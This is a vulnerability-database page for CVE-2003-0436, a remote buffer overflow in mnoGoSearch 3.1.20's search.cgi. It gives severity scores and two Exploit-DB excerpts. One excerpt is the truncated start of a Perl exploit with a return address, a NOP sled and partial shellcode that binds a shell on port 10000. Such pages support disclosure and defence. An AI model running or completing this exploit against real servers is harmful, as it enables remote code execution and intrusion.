CVE-2003-0436
published 2003-07-24CVE-2003-0436: Buffer overflow in search.cgi for mnoGoSearch 3.1.20 allows remote attackers to execute arbitrary code via a long ul parameter.
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.69%
94.9th percentile
Buffer overflow in search.cgi for mnoGoSearch 3.1.20 allows remote attackers to execute arbitrary code via a long ul parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mnogosearch | mnogosearch | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (2)
exploitdb·2003-06-10
CVE-2003-0436 MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (2)
MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/7865/info
mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.
The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.
It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.
# shellcode binds shell to port 10000
use IO::Socket;
unless (@ARGV > 0) { die "Usage ./DSR-mnogo IP"}
$host = shift(@ARGV);
$ret = pack("l",0xbfbff670);
$nop = "\x90"x5402;
$shellcode =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1
Exploit-DB
MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)
exploitdb·2003-06-10
CVE-2003-0436 MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)
MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/7865/info
mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.
The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.
It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.
#!/usr/bin/perl
#
# [ reloaded ]
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt,
# kerengge_kurus, b0iler and d'scan clan
No writeups or analysis indexed.
2003-07-24
Published